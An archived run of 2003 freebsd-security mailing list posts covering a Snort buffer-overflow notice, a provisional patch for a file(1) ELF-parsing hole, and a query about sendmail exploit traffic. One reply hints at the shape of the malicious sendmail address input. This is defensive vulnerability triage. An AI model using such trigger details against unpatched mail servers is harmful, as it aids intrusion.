From owner-freebsd-security Mon Mar 10 0:14:41 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6683037B401 for ; Mon, 10 Mar 2003 00:14:38 -0800 (PST) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id A514F43FBF for ; Mon, 10 Mar 2003 00:14:36 -0800 (PST) (envelope-from campbell@localhost.neotext.ca) Received: from localhost.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.8/8.12.5) with ESMTP id h2A8HaKd014681 for ; Mon, 10 Mar 2003 01:17:36 -0700 (MST) (envelope-from campbell@localhost.neotext.ca) Received: (from campbell@localhost) by localhost.neotext.ca (8.12.8/8.12.5/Submit) id h2A8Haks014680; Mon, 10 Mar 2003 01:17:36 -0700 (MST) Date: Mon, 10 Mar 2003 01:17:36 -0700 From: Duncan Patton a Campbell To: freebsd-security@FreeBSD.ORG Subject: Netweirdness Message-Id: <20030310011736.7f780b5a.campbell@neotext.ca> In-Reply-To: <200303061432.h26EWRaN005247@device.dyndns.org> References: <200303061432.h26EWRaN005247@device.dyndns.org> Organization: Index Express Ltd. X-Mailer: Sylpheed version 0.8.6 (GTK+ 1.2.10; i386-unknown-freebsd4.7) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg="pgp-sha1"; boundary="=.U1:xBrpUFcRAeW" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=.U1:xBrpUFcRAeW Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit We had a strangeness turn up today that is related only indirectly to FreeBSD (skip if this offends you). We have five servers at three remote locations: three in Burnaby Can. and two others in Sydney Aus. and Edmonton Can. The Burnaby boxes are all on the same subnet. Routing in *one* direction from *one* box on the Burnaby subnet to Australia (and only Aus!) was broken inside our ISP's router. The problem just went away after I reported it. So the question I have here is how bad is the average security on ISPs and is there much that can be done at our end to prevent the service from being hacked? Last week the modem went for a loop and forgot its mind. Thanks, Dhu --=.U1:xBrpUFcRAeW Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE+bEogXgQtJ7uBra8RAvTrAJ9p7f2N9uK0OPNUSIoAbgyso+xqKwCgo2uA yLJ7xdmzWiqiuxA6B/CE9ig= =6YBL -----END PGP SIGNATURE----- --=.U1:xBrpUFcRAeW-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 10 7:50:48 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EF1F137B401 for ; Mon, 10 Mar 2003 07:50:46 -0800 (PST) Received: from bubbles.electricutopia.net (adsl-67-120-245-61.dsl.sndg02.pacbell.net [67.120.245.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5367843F75 for ; Mon, 10 Mar 2003 07:50:44 -0800 (PST) (envelope-from dave@slickness.org) Received: by bubbles.electricutopia.net (Postfix, from userid 1001) id 571511524C; Mon, 10 Mar 2003 07:50:43 -0800 (PST) Date: Mon, 10 Mar 2003 07:50:43 -0800 From: David Olbersen To: freebsd-security@freebsd.org Subject: sendmail exploit in wild? Message-ID: <20030310155043.GA86716@slickness.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don't use sendmail but did get these two messages from postfix: Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] sent Message-ID: header instead of SMTP command: Message-ID: <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu> Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] sent Message-ID: header instead of SMTP command: Message-ID: <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu> I know the sendmail exploit is in the headers, does this look like it? -- David Olbersen Site: http://mp3s.mootech.net PGP Key: http://mootech.net/~dave/gpg-key.txt One hoopy frood who knows where his towel is. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 10 8: 5: 0 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 766F937B404 for ; Mon, 10 Mar 2003 08:04:57 -0800 (PST) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id B6A2443FD7 for ; Mon, 10 Mar 2003 08:04:56 -0800 (PST) (envelope-from nectar@celabo.org) Received: from madman.celabo.org (madman.celabo.org [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 4E799A3; Mon, 10 Mar 2003 10:04:56 -0600 (CST) Received: by madman.celabo.org (Postfix, from userid 1001) id 403C778C44; Mon, 10 Mar 2003 10:04:56 -0600 (CST) Date: Mon, 10 Mar 2003 10:04:56 -0600 From: "Jacques A. Vidrine" To: David Olbersen Cc: freebsd-security@freebsd.org Subject: Re: sendmail exploit in wild? Message-ID: <20030310160456.GB3720@madman.celabo.org> Mail-Followup-To: "Jacques A. Vidrine" , David Olbersen , freebsd-security@freebsd.org References: <20030310155043.GA86716@slickness.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030310155043.GA86716@slickness.org> X-Url: http://www.celabo.org/ User-Agent: Mutt/1.5.3i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Mar 10, 2003 at 07:50:43AM -0800, David Olbersen wrote: > I don't use sendmail but did get these two messages from postfix: > > Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] > sent Message-ID: header instead of SMTP command: Message-ID: > <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu> > > Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] > sent Message-ID: header instead of SMTP command: Message-ID: > <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu> > > I know the sendmail exploit is in the headers, does this look like it? No. The (known) sendmail problem is to do with parsing addresses that smell like `<><><><><><><><>' or similar. Cheers, -- Jacques A. Vidrine http://www.celabo.org/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 10 8:10:24 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 38C9F37B401; Mon, 10 Mar 2003 08:10:22 -0800 (PST) Received: from bubbles.electricutopia.net (adsl-67-120-245-61.dsl.sndg02.pacbell.net [67.120.245.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id B909143FD7; Mon, 10 Mar 2003 08:10:21 -0800 (PST) (envelope-from dave@slickness.org) Received: by bubbles.electricutopia.net (Postfix, from userid 1001) id B04041524C; Mon, 10 Mar 2003 08:10:20 -0800 (PST) Date: Mon, 10 Mar 2003 08:10:20 -0800 From: David Olbersen To: "Jacques A. Vidrine" Cc: freebsd-security@freebsd.org Subject: Re: sendmail exploit in wild? Message-ID: <20030310161020.GA92972@slickness.org> References: <20030310155043.GA86716@slickness.org> <20030310160456.GB3720@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030310160456.GB3720@madman.celabo.org> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Jacques A. Vidrine (nectar@FreeBSD.org): > No. The (known) sendmail problem is to do with parsing addresses that > smell like `<><><><><><><><>' or similar. Right. Thanks then! -- David Olbersen Site: http://mp3s.mootech.net PGP Key: http://mootech.net/~dave/gpg-key.txt One hoopy frood who knows where his towel is. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 10 8:16:50 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10B7A37B401 for ; Mon, 10 Mar 2003 08:16:48 -0800 (PST) Received: from siralan.org (12-222-67-235.client.insightBB.com [12.222.67.235]) by mx1.FreeBSD.org (Postfix) with ESMTP id F18D943FBD for ; Mon, 10 Mar 2003 08:16:46 -0800 (PST) (envelope-from mikes@siralan.org) Received: from siralan.org (localhost [127.0.0.1]) by siralan.org (8.12.8/8.12.7) with ESMTP id h2AGGj9P010644 for ; Mon, 10 Mar 2003 11:16:45 -0500 (EST) (envelope-from mikes@siralan.org) Received: (from mikes@localhost) by siralan.org (8.12.8/8.12.8/Submit) id h2AGGjcS010643 for freebsd-security@freebsd.org; Mon, 10 Mar 2003 11:16:45 -0500 (EST) From: "Michael L. Squires" Message-Id: <200303101616.h2AGGjcS010643@siralan.org> Subject: Snort 1.9.0 exploit To: freebsd-security@freebsd.org Date: Mon, 10 Mar 2003 11:16:44 -0500 (EST) X-Mailer: ELM [version 2.4ME+ PL88 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I got a message from SANS that the version of Snort that was part of 4.8-RC2, at least (1.8 through 1.9.0 and 2.0 beta) has a buffer overflow problem that could be used to gain root access. The quick fix is to disable the RPC preprocessor by commenting out the line "preprocessor rpc_decode" in snort.conf. See www.snort.org for more info. Mike Squires To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 10 8:36:19 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3531337B401 for ; Mon, 10 Mar 2003 08:36:17 -0800 (PST) Received: from gandalf.online.bg (gandalf.online.bg [217.75.128.9]) by mx1.FreeBSD.org (Postfix) with SMTP id 6D38443F93 for ; Mon, 10 Mar 2003 08:36:15 -0800 (PST) (envelope-from roam@ringlet.net) Received: (qmail 24237 invoked from network); 10 Mar 2003 16:31:53 -0000 Received: from office.sbnd.net (HELO straylight.ringlet.net) (217.75.140.130) by gandalf.online.bg with SMTP; 10 Mar 2003 16:31:53 -0000 Received: (qmail 39727 invoked by uid 1000); 10 Mar 2003 16:34:44 -0000 Date: Mon, 10 Mar 2003 18:34:44 +0200 From: Peter Pentchev To: "Michael L. Squires" Cc: freebsd-security@freebsd.org Subject: Re: Snort 1.9.0 exploit Message-ID: <20030310163444.GM578@straylight.oblivion.bg> Mail-Followup-To: "Michael L. Squires" , freebsd-security@freebsd.org References: <200303101616.h2AGGjcS010643@siralan.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="Rex5+51txc1ort/q" Content-Disposition: inline In-Reply-To: <200303101616.h2AGGjcS010643@siralan.org> User-Agent: Mutt/1.5.3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Rex5+51txc1ort/q Content-Type: text/plain; charset=windows-1251 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Mar 10, 2003 at 11:16:44AM -0500, Michael L. Squires wrote: > I got a message from SANS that the version of Snort that was part of > 4.8-RC2, at least (1.8 through 1.9.0 and 2.0 beta) has a buffer > overflow problem that could be used to gain root access. >=20 > The quick fix is to disable the RPC preprocessor by commenting out the > line "preprocessor rpc_decode" in snort.conf. >=20 > See www.snort.org for more info. Kris Kennaway , the maintainer of the security/snort port, updated it 6 days ago to 1.9.1 in response to the ISS advisory. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@sbnd.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 If the meanings of 'true' and 'false' were switched, then this sentence wou= ldn't be false. --Rex5+51txc1ort/q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+bL6k7Ri2jRYZRVMRAgaqAJ9+xEhMtNgijOOKE/tYL/FpJNomHwCgkEe8 tCVy/C+f9NMg/YwVKPIRLCI= =Xv24 -----END PGP SIGNATURE----- --Rex5+51txc1ort/q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 9:34:34 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 772D937B404; Tue, 11 Mar 2003 09:34:32 -0800 (PST) Received: from monster.schulte.org (monster.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id CEA4C43F75; Tue, 11 Mar 2003 09:34:30 -0800 (PST) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by monster.schulte.org (Postfix) with ESMTP id 8BB661FB2D; Tue, 11 Mar 2003 11:34:28 -0600 (CST) Received: from raja.nospam.schulte.org (futon.schulte.org [209.134.156.199]) by monster.schulte.org (Postfix) with ESMTP id D5D0C1FB28; Tue, 11 Mar 2003 11:34:25 -0600 (CST) Message-Id: <5.2.0.9.2.20030311113159.0386fea0@localhost> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Tue, 11 Mar 2003 11:34:40 -0600 To: "Jacques A. Vidrine" , Guy Poizat From: Christopher Schulte Subject: Re: Prov. patch for the file hole ISS disclosed Cc: freebsd-security@FreeBSD.ORG, obrien@FreeBSD.ORG In-Reply-To: <20030306154138.GA33430@madman.celabo.org> References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre8 on monster.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: >Thanks! However, this has already been fixed in -CURRENT (by import >of FILE 3.41). I do not know whether or not David plans to MFC in >time for 4.8-RELEASE. I think this should be merged into the security branches, due to possible remote exploit by third party programs that use file, such as (at the very least) amavis. >Cheers, >-- >Jacques A. Vidrine http://www.celabo.org/ >NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos >jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 9:41:31 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1CBC237B404; Tue, 11 Mar 2003 09:41:29 -0800 (PST) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0966743F85; Tue, 11 Mar 2003 09:41:28 -0800 (PST) (envelope-from nectar@celabo.org) Received: from madman.celabo.org (madman.celabo.org [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 7E31D4D; Tue, 11 Mar 2003 11:41:27 -0600 (CST) Received: by madman.celabo.org (Postfix, from userid 1001) id 64B7F78C44; Tue, 11 Mar 2003 11:41:27 -0600 (CST) Date: Tue, 11 Mar 2003 11:41:27 -0600 From: "Jacques A. Vidrine" To: Christopher Schulte Cc: Guy Poizat , freebsd-security@FreeBSD.ORG, obrien@FreeBSD.ORG Subject: Re: Prov. patch for the file hole ISS disclosed Message-ID: <20030311174126.GA57179@madman.celabo.org> Mail-Followup-To: "Jacques A. Vidrine" , Christopher Schulte , Guy Poizat , freebsd-security@FreeBSD.ORG, obrien@FreeBSD.ORG References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.2.0.9.2.20030311113159.0386fea0@localhost> X-Url: http://www.celabo.org/ User-Agent: Mutt/1.5.3i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > >Thanks! However, this has already been fixed in -CURRENT (by import > >of FILE 3.41). I do not know whether or not David plans to MFC in > >time for 4.8-RELEASE. > > I think this should be merged into the security branches, > due to possible remote exploit by third party programs that > use file, such as (at the very least) amavis. I tend to agree. David? Cheers, -- Jacques A. Vidrine http://www.celabo.org/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 9:52: 8 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 888AC37B401; Tue, 11 Mar 2003 09:52:06 -0800 (PST) Received: from hermes.pressenter.com (hermes.pressenter.com [209.224.20.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id 96F1543FCB; Tue, 11 Mar 2003 09:52:05 -0800 (PST) (envelope-from nospam@hiltonbsd.com) Received: from [209.224.36.96] (helo=daggar.sbgnet.net) by hermes.pressenter.com with smtp (Exim 3.16 #1) id 18snv1-00080b-00; Tue, 11 Mar 2003 11:52:04 -0600 Date: Tue, 11 Mar 2003 11:52:15 -0600 From: Stephen Hilton To: "Jacques A. Vidrine" Cc: , Subject: Re: Prov. patch for the file hole ISS disclosed Message-Id: <20030311115215.1628a67b.nospam@hiltonbsd.com> In-Reply-To: <20030311174126.GA57179@madman.celabo.org> References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> X-Mailer: Sylpheed version 0.8.10 (GTK+ 1.2.10; i386-portbld-freebsd4.8) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 11 Mar 2003 11:41:27 -0600 "Jacques A. Vidrine" wrote: > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > >Thanks! However, this has already been fixed in -CURRENT (by import > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > >time for 4.8-RELEASE. > > > > I think this should be merged into the security branches, > > due to possible remote exploit by third party programs that > > use file, such as (at the very least) amavis. > > I tend to agree. > > David? > I am getting ready to do a buildworld today on 4.8-RC and can test a patch if available. Does the patch provided by: Guy Poizat Appear correct ? --------------------------------------------------------------- --- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 +++ src/contrib/file/readelf.c.patched Thu Mar 6 15:02:44 2003 @@ -141,6 +141,9 @@ Elf32_Shdr sh32; Elf64_Shdr sh64; + if ( size > ( class == ELFCLASS32 ? sizeof(Elf32_Shdr) : sizeof(Elf64_Shdr) ) ) + return; + if (lseek(fd, off, SEEK_SET) == -1) error("lseek failed (%s).\n", strerror(errno)); ---------------------------------------------------------------- Thanks in advance, Stephen Hilton nospam@hiltonbsd.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 10: 0:40 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AEDE037B401 for ; Tue, 11 Mar 2003 10:00:37 -0800 (PST) Received: from pol.dyndns.org (pol.net1.nerim.net [80.65.225.93]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4A82D43F75 for ; Tue, 11 Mar 2003 10:00:33 -0800 (PST) (envelope-from guy@device.dyndns.org) Received: from oemcomputer.device.dyndns.org (partserver.pol.local [172.16.10.10]) by pol.dyndns.org (8.12.6/8.12.6) with ESMTP id h2BI0DM4015218 for ; Tue, 11 Mar 2003 19:00:17 +0100 (CET) Message-Id: <5.1.1.6.0.20030311185258.04022810@device.dyndns.org> X-Sender: guy@device.dyndns.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 11 Mar 2003 18:59:47 +0100 To: freebsd-security@FreeBSD.ORG From: "Guy P." Subject: Re: Prov. patch for the file hole ISS disclosed In-Reply-To: <20030311174126.GA57179@madman.celabo.org> References: <5.2.0.9.2.20030311113159.0386fea0@localhost> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 18:41 11/03/2003, Jacques A. Vidrine wrote: >On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > >Thanks! However, this has already been fixed in -CURRENT (by import > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > >time for 4.8-RELEASE. > > > > I think this should be merged into the security branches, > > due to possible remote exploit by third party programs that > > use file, such as (at the very least) amavis. > >I tend to agree. > >David? FYI, amavis people just released a SA where they state "We expect that all distributors of free UNIX(R)-like operating systems will address the issue shortly." See http://marc.theaimsgroup.com/?l=amavis-user&m=104740298431088&w=2 Also wanted to mention that amavis provide a way to run its processes as a non-root user, but it take some work to achieve, so we can expect some people will have "delayed" doing so ( just as i did until i realized what implications it had :] ) -- G.P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 10:15:15 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3EFA537B401; Tue, 11 Mar 2003 10:15:13 -0800 (PST) Received: from dragon.nuxi.com (trang.nuxi.com [66.93.134.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7114843F85; Tue, 11 Mar 2003 10:15:12 -0800 (PST) (envelope-from obrien@NUXI.com) Received: from dragon.nuxi.com (smmsp@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.7/8.12.7) with ESMTP id h2BIErdh059686; Tue, 11 Mar 2003 10:14:53 -0800 (PST) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.7/8.12.7/Submit) id h2BIEqlR059685; Tue, 11 Mar 2003 10:14:52 -0800 (PST) Date: Tue, 11 Mar 2003 10:14:52 -0800 From: "David O'Brien" To: "Jacques A. Vidrine" , Christopher Schulte , Guy Poizat , freebsd-security@FreeBSD.org Subject: Re: Prov. patch for the file hole ISS disclosed Message-ID: <20030311181452.GA59655@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030311174126.GA57179@madman.celabo.org> User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD Group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > >Thanks! However, this has already been fixed in -CURRENT (by import > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > >time for 4.8-RELEASE. > > > > I think this should be merged into the security branches, > > due to possible remote exploit by third party programs that > > use file, such as (at the very least) amavis. > > I tend to agree. > > David? Up to you. I'm going to do an MFC for 4.8. I am not very well setup to test the security branches. Do you want me to just MFC exactly what I committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for the 4_7 branch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 10:22:12 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4436F37B405; Tue, 11 Mar 2003 10:22:09 -0800 (PST) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 486B143F75; Tue, 11 Mar 2003 10:22:06 -0800 (PST) (envelope-from nectar@celabo.org) Received: from madman.celabo.org (madman.celabo.org [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D38A44D; Tue, 11 Mar 2003 12:22:05 -0600 (CST) Received: by madman.celabo.org (Postfix, from userid 1001) id B9C6378C44; Tue, 11 Mar 2003 12:22:05 -0600 (CST) Date: Tue, 11 Mar 2003 12:22:05 -0600 From: "Jacques A. Vidrine" To: David O'Brien Cc: Christopher Schulte , Guy Poizat , freebsd-security@FreeBSD.org Subject: Re: Prov. patch for the file hole ISS disclosed Message-ID: <20030311182205.GA57362@madman.celabo.org> Mail-Followup-To: "Jacques A. Vidrine" , David O'Brien , Christopher Schulte , Guy Poizat , freebsd-security@FreeBSD.org References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> <20030311181452.GA59655@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030311181452.GA59655@dragon.nuxi.com> X-Url: http://www.celabo.org/ User-Agent: Mutt/1.5.3i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Mar 11, 2003 at 10:14:52AM -0800, David O'Brien wrote: > On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: > > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > > I think this should be merged into the security branches, > > > due to possible remote exploit by third party programs that > > > use file, such as (at the very least) amavis. > > > > I tend to agree. > > > > David? > > Up to you. I'm going to do an MFC for 4.8. Good, thanks! > I am not very well setup to > test the security branches. Oops, I didn't read very carefully. I was talking about -STABLE only. > Do you want me to just MFC exactly what I > committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for > the 4_7 branch. No, I do not wish the new `file' to be merged into the security branches. Cheers, -- Jacques A. Vidrine http://www.celabo.org/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 10:24:30 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6F5D37B401 